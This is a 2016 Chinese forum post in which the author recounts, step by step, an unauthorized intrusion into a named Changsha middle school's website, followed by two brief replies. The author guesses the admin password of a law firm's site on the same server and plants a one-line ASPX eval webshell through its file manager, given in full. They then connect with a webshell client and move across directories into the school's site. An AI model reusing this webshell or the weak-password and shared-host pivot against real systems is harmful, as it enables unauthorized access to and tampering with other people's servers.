HanDs
管理员

看我如何渗透长沙市六中 



文章开始:
废话不多说, 直接来看站。 
不是我滴学校,所以我也就不打马赛克鸟。
  目标网址:http://cs6zhong.com/
 
好吧。这啥WISH CMS 没听说过。 应该是没开源的。
所以一般找0day也是无果,弱口令更是不用说。
我们来看看旁站吧。
 
好吧。旁站有蛮多。
http://www.hclawyer.net/  这个旁站去看看。

好像是个啥律师咨询站。话不多说,开日!

好吧。后台地址默认的。这个的话,也不知道是啥XXCMS,所以试试弱口令。Admin   admin 错误admin   admin888错误。好吧。只有来试试admin+域名中间了。Admin  hclawyer

好吧。登录进来了。  感觉有种想织梦的感觉。(小白认不出,大手勿喷。)不管了。先进去看看再说。 

真的好像织梦,后台还有文件管理器,可以上传。好吧。直接新建文件。

再插入下面的一句话:
[PHP] 纯文本查看 复制代码
?
1
<%@ Page Language="Jscript"%><%eval(Request.Item["tom"],"unsafe");%>
保存成功。用菜刀链接  
成功拿下旁站的shell现在咱来试试同IP跨目录(是旁站嘛,试试看)原本的shell目录是:F:\VhostNew\WebRoot\hclawyer\wwwroot\现在我们来把hclawyer换成cs6zhong来看看。这个我相信大家可以看懂把。

好吧。未找到路劲。心中一万个草泥马奔腾而过。长沙六中,六中,,说不定是6中?  试试看。 

好吧。跨过来了。提权下来服务器做了IP登录限制,所以就不写了。   


图片7.png

图片11.png


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
如何 渗透 长沙市 六中
#1楼
发帖时间:2016-9-18   |   查看数:0   |   回复数:2
vampire1120
不灭忍LV20
RUOruo弱口令那么好猜  醉

vampire1120上厕所玩电脑不小心入侵了美国白宫官网,被FBI发现罚款4金币。网络就像罂粟,美丽如媚,危险如恶!

2016-9-18 #2楼
loganic
睡火莲LV18
信任一个人很难、但再次相信一个人更难!所以别把别人的善良当软弱、别把他人的宽容当懦弱!好脾气的人不轻易发火、不代表不会发火!性子淡的人只是装糊涂、不代表没有底线!

2016-10-14 #3楼
游客组
快速回复